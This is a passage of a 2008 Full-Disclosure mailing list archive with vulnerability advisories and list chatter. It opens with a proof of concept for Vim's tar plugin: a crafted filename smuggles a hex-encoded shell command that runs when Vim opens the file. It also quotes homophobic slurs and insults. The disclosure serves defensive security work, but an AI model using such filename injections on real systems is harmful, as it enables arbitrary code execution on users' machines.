> /bin/bash: retu: command not found
> /bin/bash: bar.tar|retu|'bar.tar: command not found
>
> It's easy to see that it is still possible to execute arbitrary shell commands.
>
> $VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:
>
>   136   if tarfile =~# '\.\(gz\|tgz\)$'
>   137    " call Decho("1: exe silent r! gzip -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
> * 138    exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
>   139   elseif tarfile =~# '\.lrp'
>   140    " call Decho("2: exe silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - ")
> * 141    exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - "
>   142   elseif tarfile =~# '\.bz2$'
>   143    " call Decho("3: exe silent r! bzip2 -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
> * 144    exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
>   145   else
>   146    " call Decho("4: exe silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile))
> **147    exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile)
>   [...]
>   444 fun s:Escape(name)
>   445  " shellescape() was added by patch 7.0.111
>   446  if exists("*shellescape")
>   447   let qnameq= shellescape(a:name)
>   448  else
>   449   let qnameq= g:tar_shq . a:name . g:tar_shq
>   450  endif
>   451  return qnameq
>   452 endfun
>
> (*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.
>
> (**) tar(1) allows arbitrary command execution via options ``--to-command'', and ``--use-compress-program''.
>
> The updated tarplugin attack is rather simple:
>
> $ rm -rf ./*
> $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 | xxd -r\`;'bar.tar"
> $ vim +:q ./foo*
> $ ls -l pwned
> -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned
>
> Cheers,
> Jan Minar.
>
> ------------------------------
>
> Message: 6
> Date: Tue, 1 Jul 2008 21:25:39 +0100
> From: Steve Kemp
> Subject: [Full-disclosure] [SECURITY] [DSA 1560-1] New sympa packages fix denial of service
> To: debian-security-announce at lists.debian.org
> Message-ID: <20080701202539.GA32605 at steve.org.uk>
> Content-Type: text/plain; charset=us-ascii
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> - ------------------------------------------------------------------------
> Debian Security Advisory DSA-1600-1                    security at debian.org
> http://www.debian.org/security/                                   Steve Kemp
> July 01, 2008                         http://www.debian.org/security/faq
> - ------------------------------------------------------------------------
>
> Package        : sympa
> Vulnerability  : dos
> Problem type   : remote
> Debian-specific: no
> CVE Id(s)      : CVE-2008-1648
> Debian Bug     : 475163
>
> It was
> discovered that sympa, a modern mailing list manager, would crash when processing certain types of malformed messages.
>
> For the stable distribution (etch), this problem has been fixed in version 5.2.3-1.2+etch1.
>
> For the unstable distribution (sid), this problem has been fixed in version 5.3.4-4.
>
> We recommend that you upgrade your sympa package.
>
> Upgrade instructions
> - --------------------
>
> wget url
>         will fetch the file for you
> dpkg -i file.deb
>         will install the referenced file.
>
> If you are using the apt-get package manager, use the line for sources.list as given below:
>
> apt-get update
>         will update the internal database
> apt-get upgrade
>         will install corrected packages
>
> You may use an automated update by adding the resources from the footer to the proper configuration.
>
> Debian GNU/Linux 4.0 alias etch
> - -------------------------------
>
> Source archives:
>
> These files will probably be moved into the stable distribution on its next update.
>
> - ---------------------------------------------------------------------------------
> For apt-get: deb http://security.debian.org/ stable/updates main
> For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
> Mailing list: debian-security-announce at lists.debian.org
> Package info: `apt-cache show ' and http://packages.debian.org/
>
> ------------------------------
>
> Message: 7
> Date: Wed, 2 Jul 2008 02:02:02 +0200 (CEST)
> From: Michal Zalewski
> Subject: [Full-disclosure] [tool] ratproxy - passive web
> application security assessment tool
> To: bugtraq at securityfocus.com, websecurity at webappsec.org
> Cc: full-disclosure at lists.grok.org.uk
> Message-ID:
> Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
>
> Hi all,
>
> I am happy to announce that we've just open sourced ratproxy - a free, passive web security assessment tool. This utility is designed to transparently analyze legitimate, browser-driven interactions with tested web applications - and automatically pinpoint, annotate, and prioritize potential flaws or areas of concern on the fly.
>
> The proxy analyzes problems such as cross-site script inclusion threats, insufficient cross-site request forgery defenses, caching issues, potentially unsafe cross-domain code inclusion schemes and information leakage scenarios, and much more.
>
> For a detailed discussion of the utility, please visit:
> http://code.google.com/p/ratproxy/wiki/RatproxyDoc
>
> Source code is available at:
> http://code.google.com/p/ratproxy/downloads/list
>
> And finally, a screenshot of a sample report can be found here:
> http://lcamtuf.coredump.cx/ratproxy-screen.png
>
> The tool should run on Linux, *BSD, MacOS X, and Windows (Cygwin). Since it is in beta, there might be some kinks to be ironed out, and not all web technologies might be properly accounted for.
> Feedback is appreciated.
>
> Please keep in mind that the proxy is meant to highlight interesting patterns in web applications; a further analysis by a security professional is required to interpret the significance of results for a particular platform.
>
> Cheers,
> /mz
>
> ------------------------------
>
> Message: 8
> Date: Wed, 2 Jul 2008 02:19:01 -0300
> From: "Filipe Balestra"
> Subject: Re: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege Escalation Vulnerability
> To:
> Message-ID:
> Content-Type: text/plain; charset="iso-8859-1"
>
> mrdkaaa,
>
> are you saying that this vulnerability is not new to the public?
>
> The program phgrafx had some vulnerabilities published, but this one is not the same as any other that I can find in securityfocus. One program can have a lot of vulnerabilities :)
>
> But yes, this vulnerability is at least four years old, but was not public.
>
> Anyway, QNX released Service Packs to solve some security problems in the past, and it's not our problem, we are advising the customers, they can choose the company or not. If you are a customer you probably would like to know about security issues in all products that you use. Also, we agree it's a crap vuln, that's why we took too long to release it. Whatever, why hold it?
>
> p.s.: Rodrigo and I are no longer working for Scanit, so it's just a personal opinion, not a company official position. If you want to know about the company vulnerability release process or any other information, please, contact the Scanit R&D team.
>
> Cheers,
>
> Filipe Alcarde Balestra
>
> ------------------------------
>
> Message: 9
> Date: Wed, 2 Jul 2008 08:29:43 +0200
> From: Tonnerre Lombard
> Subject: Re: [Full-disclosure] Full-Disclosure?
> introducing lul-disclosure.
> To: staff at lul-disclosure.net
> Cc: full-disclosure at lists.grok.org.uk
> Message-ID: <20080702082943.2811aba5 at wssyg117.sygroup-int.ch>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi,
>
> On Mon, 30 Jun 2008 21:57:29 -0400, staff wrote:
> > Are you ready for a site that isn't full of fagottry? Where Gadi can't steal your money or eat your lunches? Where you can freely submit lulz to be published? Where Theo's defeat and denial are brought to light? Wait no more!
>
> You mean a site which evidently cannot tell the difference between local and remote root vulnerabilities? (The local root exploit for obsd4 which is published on that site contains a patch to increment the count of _remote_ vulnerabilities on the obsd web site.)
>
> Tonnerre
> --
> SyGroup GmbH
> Tonnerre Lombard
>
> Solutions Systematiques
> Tel:+41 61 333 80 33                         Güterstrasse 86
> Fax:+41 61 383 14 67                         4053 Basel
> Web:www.sygroup.ch                           tonnerre.lombard at sygroup.ch
>
> ------------------------------
>
> Message: 10
> Date: Tue, 01 Jul 2008 21:47:36 +0200
> From: DeepSec 2008
> Subject: [Full-disclosure] Deepsec Talks 2007 are online - registration for 2008 is open
> To: full-disclosure at lists.grok.org.uk
> Message-ID: <486A89D8.2000303 at deepsec.net>
> Content-Type: text/plain; charset=UTF-8; format=flowed
>
> Dear Madam, dear Sir,
>
> DeepSec Vienna, the annual In-Depth Security Conference has opened online registrations for 2008.
> Registrations will receive a discount of 5% off the regular fees until August 31st if you use the following promotional code: earlybird-L4KZIEUE on our online registration form at https://deepsec.net/register/
>
> Videos from 2007 are online:
>
> Also we are happy to announce that talks from last year's conference are online. Listen to last year's talks in full length at:
> http://video.google.com/videosearch?q=deepsec&sitesearch=#
>
> Call for Papers still open for two weeks:
>
> If you have some good ideas for a talk at the conference and haven't decided yet to submit, we encourage you to do so now. We still accept submissions at https://deepsec.net/cfp/ or via e-mail to: cfp at deepsec.net
>
> We hope to hear from you and of course to meet in Vienna in November!
>
> Best Regards,
>
> Paul Böhm,
> René Pfeiffer,
> Michael Kafka
> DeepSec GmbH
>
> --
> DeepSec In-Depth Security Conference
> November 11th to 14th 2008, Vienna, Austria
> https://deepsec.net/
>
> ------------------------------
>
> Message: 11
> Date: Wed, 02 Jul 2008 04:08:38 -0300
> From: root
> Subject: Re: [Full-disclosure] Full-Disclosure? introducing lul-disclosure.
> To: staff at lul-disclosure.net
> Cc: full-disclosure at lists.grok.org.uk
> Message-ID: <486B2976.8000708 at fibertel.com.ar>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> You couldn't do the remote exploit even with a Google video documenting it step by step.
> More like fail-disclosure.
>
> staff wrote:
> > Are you ready for a site that isn't full of fagottry? Where Gadi can't steal your money or eat your lunches? Where you can freely submit lulz to be published? Where Theo's defeat and denial are brought to light? Wait no more!
> >
> > http://lul-disclosure.net/
> >
> > WhiteHat? BlackHat?
> > We are lulzhat.
> > Fuck you and your hats.
> >
> > ------------------------------------------------------------------------
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> ------------------------------
>
> End of Full-Disclosure Digest, Vol 41, Issue 3
> **********************************************

unsubscribe

From jamie at canonical.com Wed Jul 2 13:45:38 2008
From: jamie at canonical.com (Jamie Strandboge)
Date: Wed, 2 Jul 2008 08:45:38 -0400
Subject: [Full-disclosure] [USN-619-1] Firefox vulnerabilities
Message-ID: <20080702124538.GM11562@severus.strandboge.com>

===========================================================
Ubuntu Security Notice USN-619-1                 July 02, 2008
firefox vulnerabilities
CVE-2008-2798, CVE-2008-2799, CVE-2008-2800, CVE-2008-2801, CVE-2008-2802, CVE-2008-2803, CVE-2008-2805, CVE-2008-2806, CVE-2008-2807, CVE-2008-2808, CVE-2008-2809, CVE-2008-2810, CVE-2008-2811
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  firefox                         1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1

Ubuntu 7.04:
  firefox                         2.0.0.15+0nobinonly-0ubuntu0.7.4

Ubuntu 7.10:
  firefox                         2.0.0.15+1nobinonly-0ubuntu0.7.10

After a standard system upgrade you need to restart Firefox to effect the necessary changes.

Details follow:

Various flaws were discovered in the browser engine. By tricking a user into opening a malicious web page, an attacker could cause a denial of service via application crash, or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-2798, CVE-2008-2799)

Several problems were discovered in the JavaScript engine. If a user were tricked into opening a malicious web page, an attacker could perform cross-site scripting attacks. (CVE-2008-2800)

Collin Jackson discovered various flaws in the JavaScript engine which allowed JavaScript to be injected into signed JAR files. If a user were tricked into opening malicious web content, an attacker may be able to execute arbitrary code with the privileges of a different website or link content within the JAR file to an attacker-controlled JavaScript file. (CVE-2008-2801)

It was discovered that Firefox would allow non-privileged XUL documents to load chrome scripts from the fastload file. This could allow an attacker to execute arbitrary JavaScript code with chrome privileges. (CVE-2008-2802)

A flaw was discovered in Firefox that allowed overwriting trusted objects via mozIJSSubScriptLoader.loadSubScript(). If a user were tricked into opening a malicious web page, an attacker could execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-2803)

Claudio Santambrogio discovered a vulnerability in Firefox which could lead to stealing of arbitrary files. If a user were tricked into opening malicious content, an attacker could force the browser into uploading local files to the remote server.
(CVE-2008-2805)

Gregory Fleischer discovered a flaw in Java LiveConnect. An attacker could exploit this to bypass the same-origin policy and create arbitrary socket connections to other domains. (CVE-2008-2806)

Daniel Glazman found that an improperly encoded .properties file in an add-on can result in uninitialized memory being used. If a user were tricked into installing a malicious add-on, the browser may be able to see data from other programs. (CVE-2008-2807)

Masahiro Yamada discovered that Firefox did not properly sanitize file URLs in directory listings, resulting in files from directory listings being opened in unintended ways or not being able to be opened by the browser at all. (CVE-2008-2808)

John G. Myers discovered a weakness in the trust model used by Firefox regarding alternate names on self-signed certificates. If a user were tricked into accepting a certificate containing alternate name entries, an attacker could impersonate another server. (CVE-2008-2809)

A flaw was discovered in the way Firefox opened URL files. If a user were tricked into opening a bookmark to a malicious web page, the page could potentially read from local files on the user's computer. (CVE-2008-2810)

A vulnerability was discovered in the block reflow code of Firefox. This vulnerability could be used by an attacker to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking the program.
(CVE-2008-2811)

Updated packages for Ubuntu 6.06 LTS:

Updated packages for Ubuntu 7.04:

amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_amd64.deb Size/MD5: 174366 bed6cb9c880507b290faf0332db1717c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_amd64.deb Size/MD5: 254936 e113790e50610566ddf6c1c94f964b3e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_amd64.deb Size/MD5: 888168 0fe2f646e715adcc0f3e75253c331bb6 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 49787920 b63b40a508cb5bfbbf53059be10d8391 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 3177264 9f821bade8d63783a367f82328673d87 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 86906 b9c62c2432f49db6b851b8dc807da17d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 62092 e674ecd502eacda834368c557e1b6143 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 9294592 79e1b6e99dbce290cd56ba6755dc881d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 228854 5fdbf6bd20f86f70797316b36ab4d173 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 163288 b78c777702f3df4f0ebea2ebe63ce6d6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 254924 3465792dc109b728a78d6ffb29f53376 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 809578 
4b2310f5cb97c4e296180cb40756a894 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 52298392 2b28d6ee19d84e536245eb95d0a8a909 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 3188938 7018bb95c07c6aaa97cde7b972a20166 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 90740 bc84e90a93fb5b7b9f20d67c86c03a2e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 62926 e57644c65aea1a4f90f523353bf1e5b1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 10365110 3c0dfb58abb3d0efa6735f4cc98d7b20 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 228860 3ba05d40bcb2a5f81c1b109015c4784a http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 180002 733154c484aa8048529f64e366d8cb29 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 254952 ced3de59adae121b57919d85ef2ee7c8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 896026 c822eb94fd5cebae2c49ffd3afcfaef4 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 49823786 e4c4ad5e13abfc980dcb8845170a6066 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 3175916 2736c2ab5c8fe48c0f2bfc670237f7d3 
http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 86592 9794cd53ceaab43313006dc928090ca6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 62138 c4d4d60255fa8a232436103ecbbe8d26 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 9571186 d2d4086ccfe3d59683645a431822f0f4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 228848 a3b0b8cf03b5ccd5da1e4bfe4debde7e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 162076 6264a5f87b7d8492afbeec02f14a97fe http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 254936 ba67be4782a972a18fe465fca598b34b http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 801408 074ce0ac99fbfe8467768644edc25dad Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10.diff.gz Size/MD5: 193549 3df61e6e5dda06822772c81f55a5e09c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10.dsc Size/MD5: 1189 e474d538b042590c54cf779317c127be http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly.orig.tar.gz Size/MD5: 37810765 e123b1b65f4ed97980590928f961c5f2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.15+1nobinonly-0ubuntu0.7.10_all.deb Size/MD5: 200814 973c84088bba9fe7619562607649ae91 amd64 architecture (Athlon64, Opteron, EM64T Xeon): 
http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 78049446 ff9b6ef4ff7e676de1e7631bf7cb8a3d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 3197256 c69ca60dc08dc4dd83b53df27cbd7f32 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 98146 cb5365397df1022104b9c9d8de5b6409 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 67152 1b33bdeb31a95455a4ea0a6024cc76e1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 10460276 7b2bf1c6f2e685e09d1e5dd937a380b4 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 77181324 f27d2a52d29eb953a2a2b2e72251ecfe http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 3184840 e58f0f841248dbdc40513724ddaa84cf http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 91840 87c455efc0df2403f962b0df9d4e6177 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 66434 2bf2dc0e8a6333c58577db96edd98e35 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 9203290 7e0ebb7384bd4b504bff560e370291a5 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 77460616 71b471e86aa5c6e2eac09a3251b80d94 http://ports.ubuntu.com/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 3182378 
d90bfbae7b9743aeb4d592f517361c90 http://ports.ubuntu.com/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 91500 97848bd89ef94ffc7bd095185fe508f0 http://ports.ubuntu.com/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 66380 8dd93b124088314c1449195ce8201f6c http://ports.ubuntu.com/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 9062590 4850c76f7d1e1c6ca9658863ac77e15f powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 80664386 0d6ef7225c028ede3092d9f86af0d736 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 3200788 05c74bf9d2ee0d0407c41a83651ea0a4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 96178 58b2e155dc810ef5ea790e7af6bbd71d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 67430 8b6d5d82b36e32c68b1b8eb2aeddd06e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 10303234 18af52f985e61e7b4d9f573aafd5b6d6 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 78015546 63c0534c7bba8d01e36158fb58b6693e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 3182386 45c83bd5709c26e42d19a4a02d7e72ec http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 91608 ad47d76f9e3afec9105cefaf73510d82 
From mrdkaaa at stream.cz Wed Jul 2 17:33:47 2008
From: mrdkaaa at stream.cz (mrdkaaa)
Date: Wed, 02 Jul 2008 18:33:47 +0200 (CEST)
Subject: [Full-disclosure] Full-Disclosure? introducing lul-disclosure.
In-Reply-To: <20080702082943.2811aba5@wssyg117.sygroup-int.ch>
Message-ID: <20.36-21823-232776016-1215016427@stream.cz>

Tonnerre, does it hurt you to use your brain for thinking?

m.

> ------------ Original message ------------
> From: Tonnerre Lombard
> Subject: Re: [Full-disclosure] Full-Disclosure? introducing lul-disclosure.
> Date: 02.7.2008 08:31:26
> ----------------------------------------
> Salut,
>
> On Mon, 30 Jun 2008 21:57:29 -0400, staff wrote:
> > Are you ready for a site that isn't full of fagottry? Where Gadi can't
> > steal your money or eat your lunches? Where you can freely submit
> > lulz to be published? Where Theo's defeat and denial are brought to
> > light? Wait no more!
>
> You mean a site which evidently cannot tell the difference between
> local and remote root vulnerabilities? (The local root exploit for
> obsd4 which is published on that site contains a patch to increment the
> count of _remote_ vulnerabilities on the obsd web site.)
>
> Tonnerre
> --
> SyGroup GmbH
> Tonnerre Lombard
>
> Solutions Systematiques
> Tel:+41 61 333 80 33  Güterstrasse 86
> Fax:+41 61 383 14 67  4053 Basel
> Web:www.sygroup.ch    tonnerre.lombard at sygroup.ch
>
>

From remove-vuln at secunia.com Wed Jul 2 15:53:27 2008
From: remove-vuln at secunia.com (Secunia Research)
Date: Wed, 2 Jul 2008 16:53:27 +0200
Subject: [Full-disclosure] Secunia Research: VLC Media Player WAV Processing Integer Overflow
Message-ID: <200807021453.m62ErRFj011250@ca.secunia.com>

======================================================================

                     Secunia Research 02/07/2008

          - VLC Media Player WAV Processing Integer Overflow -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* VLC Media Player 0.8.6h on Windows

NOTE: Prior versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System access
Where:  Remote

======================================================================
3) Vendor's Description of Software

"VLC media player is a highly portable multimedia player for various
audio and video formats (MPEG-1, MPEG-2, MPEG-4, DivX, mp3, ogg, ...)
as well as DVDs, VCDs, and various streaming protocols."

Product Link:
http://www.videolan.org/vlc/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in VLC Media Player,
which can be exploited by malicious people to compromise a user's
system.

The vulnerability is caused by an integer overflow error within the
"Open()" function in modules/demux/wav.c. This can be exploited to
cause a heap-based buffer overflow via a specially crafted WAV file
having an overly large "fmt" chunk.

Successful exploitation may allow execution of arbitrary code.

======================================================================
5) Solution

Update to version 0.8.6i, which should be available soon.

Do not open untrusted WAV files.

======================================================================
6) Time Table

27/06/2008 - Vendor notified.
30/06/2008 - Vendor response.
02/07/2008 - Public disclosure.

======================================================================
7) Credits

Discovered by Alin Rad Pop, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2008-2430 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-29/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================

From xploitable at gmail.com Wed Jul 2 19:16:38 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 2 Jul 2008 19:16:38 +0100
Subject: [Full-disclosure] n3td3v podcast
Message-ID: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com>

n3td3v is starting a podcast soon. I will be talking about the latest
news post on n3td3v - Google Groups ... watch the internet for more info.
All the best,

n3td3v

Public website: http://n3td3v.googlepages.com

From hernan at gmail.com Wed Jul 2 19:42:15 2008
From: hernan at gmail.com (Hernan Ochoa)
Date: Wed, 2 Jul 2008 15:42:15 -0300
